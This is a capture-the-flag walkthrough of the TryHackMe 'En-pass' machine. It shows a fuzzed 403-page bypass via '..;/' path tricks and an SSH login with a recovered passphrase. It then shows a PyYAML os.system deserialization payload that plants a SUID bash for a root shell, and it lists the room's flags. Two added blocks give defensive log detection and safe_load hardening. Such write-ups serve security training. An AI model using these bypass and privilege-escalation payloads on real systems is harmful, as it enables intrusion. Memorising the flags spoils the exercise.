Description:
Get what you can't.

Link: https://tryhackme.com/room/enpass



  • What is the user flag?

Hint: The path you get will forbid to see but you can bypass it.

The /reg.php page:

┌──(user㉿parrot)-[/data/En-pass/files]
└─$ curl -s http://10.10.67.150:8001/reg.php | tr -s '\n'

<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>En-Pass</title>

[REDACTED]

</head>
<body>
<img src="sau.jpg" alt="sau">
<h1>EN-PASS</h1>
<div  id="container">
  <form method="POST" action="/reg.php">
   
    <input type="text" id="title" name="title" placeholder="Input">
   
    <input type="submit" value="Submit">
<h4 style='color:rgb(83, 21, 165);'> <?php
     
if($_SERVER["REQUEST_METHOD"] == "POST"){
   $title = $_POST["title"];
   if (!preg_match('/[a-zA-Z0-9]/i' , $title )){
          
          $val = explode(",",$title);
          $sum = 0;
          
          for($i = 0 ; $i < 9; $i++){
                if ( (strlen($val[0]) == 2) and (strlen($val[8]) ==  3 ))  {
                    if ( $val[5] !=$val[8]  and $val[3]!=$val[7] ) 
            
                        $sum = $sum+ (bool)$val[$i]."<br>"; 
                }
          
          
          }
          if ( ($sum) == 9 ){
            
              echo $result;//do not worry you'll get what you need.
              echo " Congo You Got It !! Nice ";
        
            
            }
            
                    else{
                      echo "  Try Try!!";
                
                    }
          }
        
          else{
            echo "  Try Again!! ";
      
          }     
 
  }
 
?>
</h4>
  </form>
</div>
</body>
</html>

At this point we have the passphrase for the SSH private key, but it does not work on its own.
The only thing left is the 403.php page.
Let's try 403fuzzer, proxied through Burp Suite so every request can be inspected:

┌──(user㉿parrot)-[/data/src/403fuzzer]
└─$ python3 403fuzzer.py -u http://10.10.67.150:8001/403.php -hc 403,404 --proxy http://localhost:8080

Sending header payloads...

Proxy flag was detected. Skipping trailing dot payload...

Sending URL payloads...
Response Code: 200  Length: 2563  Payload: /#403.php
Response Code: 200  Length: 2563  Payload: /#?403.php
Response Code: 400  Length: 306 Payload: /%2e%2e/403.php
Response Code: 200  Length: 2563  Payload: /#403.php
Response Code: 400  Length: 306 Payload: /%2e%2e/403.php
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /403.php%3b/%2e.
Response Code: 200  Length: 2563  Payload: /403.php%3b/..
Response Code: 200  Length: 2563  Payload: /403.php/%2e%2e
Response Code: 200  Length: 2563  Payload: /403.php/%2e%2e/
Response Code: 200  Length: 2563  Payload: /403.php/..
Response Code: 200  Length: 2563  Payload: /403.php/../
Response Code: 200  Length: 2563  Payload: /403.php/../../
Response Code: 200  Length: 2563  Payload: /403.php/../../../
Response Code: 200  Length: 2563  Payload: /403.php/../../..//
Response Code: 200  Length: 2563  Payload: /403.php/../..//
Response Code: 200  Length: 2563  Payload: /403.php/../..//../
Response Code: 200  Length: 2563  Payload: /403.php/.././../
Response Code: 200  Length: 2563  Payload: /403.php/../.;/../
Response Code: 200  Length: 2563  Payload: /403.php/..//
Response Code: 200  Length: 2563  Payload: /403.php/..//../
Response Code: 200  Length: 2563  Payload: /403.php/..//../../
Response Code: 200  Length: 2563  Payload: /403.php/../;/../
Response Code: 200  Length: 917 Payload: /403.php/..;/ <------------------ interesting
Response Code: 200  Length: 917 Payload: /403.php/..;//../
Response Code: 200  Length: 2563  Payload: /403.php//../../
Response Code: 200  Length: 2563  Payload: /403.php;%2f%2f/../
Response Code: 200  Length: 2563  Payload: /403.php;%2f..%2f/../
Response Code: 200  Length: 2563  Payload: /403.php;/%2e%2e
Response Code: 200  Length: 2563  Payload: /403.php;/%2e%2e/
Response Code: 200  Length: 2563  Payload: /403.php;/%2e.
Response Code: 200  Length: 2563  Payload: /403.php;/.%2e
Response Code: 200  Length: 2563  Payload: /403.php;/..
Response Code: 200  Length: 2563  Payload: /403.php;/../
Response Code: 200  Length: 2563  Payload: /403.php;/../../
Response Code: 200  Length: 2563  Payload: /403.php;/../..//
Response Code: 200  Length: 2563  Payload: /403.php;/.././../
Response Code: 200  Length: 2563  Payload: /403.php;/../.;/../
Response Code: 200  Length: 2563  Payload: /403.php;/..//
Response Code: 400  Length: 306 Payload: /403.php;/..//%2e%2e/
Response Code: 200  Length: 2563  Payload: /403.php;/..//../
Response Code: 200  Length: 2563  Payload: /403.php;/..///
Response Code: 200  Length: 2563  Payload: /403.php;/../;/../
Response Code: 200  Length: 2563  Payload: /403.php;/..
Response Code: 200  Length: 2563  Payload: /403.php;//../../
Response Code: 400  Length: 306 Payload: /;/..//%2e%2e/403.php
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /#403.php
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /
Response Code: 200  Length: 2563  Payload: /
Response code: 200   Response length: 0           Sent OPTIONS method. 

Response length was 0 so probably NOT worth checking out....

Response Headers: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 0

The interesting request with an HTTP 200 response:

GET /403.php/..;/ HTTP/1.1
Host: 10.10.67.150:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

Which returns:

HTTP/1.1 200 OK
Date: Wed, 12 May 2021 17:07:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 917
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>En-Pass</title>

[REDACTED]

<h3>Glad to see you here.Congo, you bypassed it. 'imsau' is waiting for you somewhere.</h3>
</body>
</html> 
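As an added example (not part of the original writeup): a small Python detection routine that scans Apache access-log lines for the path-parameter (`..;/`) and encoded dot-segment tricks the fuzzer used above, and reports a bypass candidate when such a request got a 200 for a resource that answered 403 to a plain request. The log lines, IP and timestamps are constructed.

```python
import re
from itertools import takewhile
from urllib.parse import unquote

# Constructed Apache combined-style log lines (not from the room); targets mirror the fuzzer payloads.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2021:17:07:56 +0000] "GET /403.php HTTP/1.1" 403 297 "-" "curl/7.74.0"
10.0.0.5 - - [12/May/2021:17:07:56 +0000] "GET /403.php/..;/ HTTP/1.1" 200 917 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2021:17:07:57 +0000] "GET /403.php;/%2e%2e/ HTTP/1.1" 200 2563 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2021:17:07:58 +0000] "GET /reg.php HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
10.0.0.5 - - [12/May/2021:17:07:59 +0000] "GET /files/my%20doc.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def suspicious_reasons(target):
    """Why a request target looks like a path-normalization bypass (empty list if it does not)."""
    path = target.split("?", 1)[0]
    decoded = unquote(path)
    reasons = []
    if ";" in path:
        reasons.append("path parameter ';' in URL path (the '..;/' trick)")
    if re.search(r"%2e|%2f", path, re.IGNORECASE):
        reasons.append("percent-encoded '.' or '/' in path")
    if re.search(r"(^|/)\.\.(/|;|$)", decoded):
        reasons.append("dot-dot segment after decoding")
    return reasons


def base_resource(target):
    """Resource a bypass is aimed at: drop path params, keep segments before the first dot segment."""
    segs = unquote(target.split("?", 1)[0]).split(";", 1)[0].split("/")
    kept = [s for s in takewhile(lambda s: s not in (".", ".."), segs) if s]
    return "/" + "/".join(kept)


def analyze(log_text):
    """Return (flagged records, bypass candidates). A candidate is a flagged target answered 200
    for a resource that also answered 403 to a plain request somewhere in the same log."""
    records = []
    for m in filter(None, map(LOG_RE.match, log_text.splitlines())):
        r = m.groupdict()
        r["status"] = int(r["status"])
        r["reasons"] = suspicious_reasons(r["target"])
        r["resource"] = base_resource(r["target"])
        records.append(r)
    forbidden = {r["resource"] for r in records if r["status"] == 403 and not r["reasons"]}
    flagged = [r for r in records if r["reasons"]]
    bypasses = [r["target"] for r in flagged if r["status"] == 200 and r["resource"] in forbidden]
    return flagged, bypasses
```

The benign `/files/my%20doc.txt` line shows that only encoded `.`/`/` and path parameters are flagged, not percent-encoding in general.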

Now we have a username and a passphrase to log in with:

┌──(user㉿parrot)-[/data/En-pass/files]
└─$ ssh -i key imsau@10.10.67.150
Enter passphrase for key 'key': cimihan_are_you_here?
$ cat user.txt  
1c5ccb6ce6f3561e302e0e516c633da9

USER FLAG: 1c5ccb6ce6f3561e302e0e516c633da9

  • What is the root flag?

Running pspy64 reveals a cron job executed by root every minute:

2021/05/12 19:02:01 CMD: UID=0    PID=22837  | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml 
2021/05/12 19:02:01 CMD: UID=0    PID=22836  | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml 
2021/05/12 19:02:01 CMD: UID=0    PID=22835  | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml 
2021/05/12 19:02:01 CMD: UID=0    PID=22834  | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml 
2021/05/12 19:02:01 CMD: UID=0    PID=22833  | /usr/sbin/CRON -f 
2021/05/12 19:02:01 CMD: UID=0    PID=22832  | /usr/sbin/CRON -f 
2021/05/12 19:02:01 CMD: UID=0    PID=22838  | sudo chown root:root /tmp/file.yml 
2021/05/12 19:02:01 CMD: UID=0    PID=22839  | sudo /usr/bin/python /opt/scripts/file.py 
2021/05/12 19:02:05 CMD: UID=0    PID=22840  | ps -e -o pid,ppid,state,command 
2021/05/12 19:03:01 CMD: UID=0    PID=22846  | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml 
2021/05/12 19:03:01 CMD: UID=0    PID=22845  | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml 
2021/05/12 19:03:01 CMD: UID=0    PID=22844  | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml 
2021/05/12 19:03:01 CMD: UID=0    PID=22843  | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml 
2021/05/12 19:03:01 CMD: UID=0    PID=22842  | /usr/sbin/CRON -f 
2021/05/12 19:03:01 CMD: UID=0    PID=22841  | /usr/sbin/CRON -f 
2021/05/12 19:03:01 CMD: UID=0    PID=22847  | sudo chown root:root /tmp/file.yml 
2021/05/12 19:03:01 CMD: UID=0    PID=22848  | sudo /usr/bin/python /opt/scripts/file.py 
2021/05/12 19:03:07 CMD: UID=0    PID=22849  | ps -e -o pid,ppid,state,command 

The cron job runs the following Python script with sudo and then removes /tmp/file.yml:

imsau@enpass:/opt/scripts$ cat file.py 
#!/usr/bin/python
import yaml


class Execute():
  def __init__(self,file_name ="/tmp/file.yml"):
    self.file_name = file_name
    self.read_file = open(file_name ,"r")

  def run(self):
    return self.read_file.read()

data  = yaml.load(Execute().run())

We do not have write access to the script, but searching for exploits affecting the imported yaml library leads to this issue: yaml.load() with the default loader deserializes arbitrary Python objects from the document, and the file it reads, /tmp/file.yml, is one we can create ourselves.
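As an added example (not part of the original writeup), the hardened counterpart of file.py in Python: pre-screen the document for python/* tags and parse it with yaml.safe_load instead of yaml.load. Both sample documents are constructed; the harmless os.getcwd tag stands in for a real payload.

```python
import re

# Constructed inputs (not from the room): a document using the python-specific tag family
# that file.py's yaml.load() would execute, and a benign one. os.getcwd is harmless.
MALICIOUS_DOC = "!!python/object/apply:os.getcwd []\n"
BENIGN_DOC = "name: imsau\nports: [22, 8001]\n"

# !!python/... is shorthand for the tag:yaml.org,2002:python/ namespace; both spellings are matched.
PYTHON_TAG_RE = re.compile(r"!!python/[\w/.:]*|!<tag:yaml\.org,2002:python/[^>]*>")


def find_python_tags(text):
    """List the python-specific YAML tags in a document (a cheap pre-screen, not the real control)."""
    return PYTHON_TAG_RE.findall(text)


def load_untrusted(text):
    """Load YAML from an untrusted file. The actual fix for file.py is the loader choice:
    yaml.safe_load builds only dicts, lists and scalars and raises on python/* tags, whereas
    yaml.load() with the default Loader on older PyYAML constructs arbitrary objects."""
    tags = find_python_tags(text)
    if tags:
        return ("rejected", tags)           # refuse before parsing; worth a log line too
    try:
        import yaml                         # PyYAML, the same library file.py imports
    except ImportError:
        return ("unavailable", None)
    try:
        return ("ok", yaml.safe_load(text))
    except yaml.YAMLError as exc:           # includes ConstructorError for tags the pre-screen missed
        return ("error", str(exc))
```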

$ cp `which bash` /tmp/bash
$ cat > /tmp/file.yml << EOF
!!python/object/new:os.system ["chown root /tmp/bash;chmod u+s /tmp/bash"]
EOF

After a minute, we have a root shell:

imsau@enpass:/tmp$ ./bash -p
bash-4.3# cat /root/root.txt
5d45f08ee939521d59247233d3f8faf

ROOT FLAG: 5d45f08ee939521d59247233d3f8faf

SUMMARY:
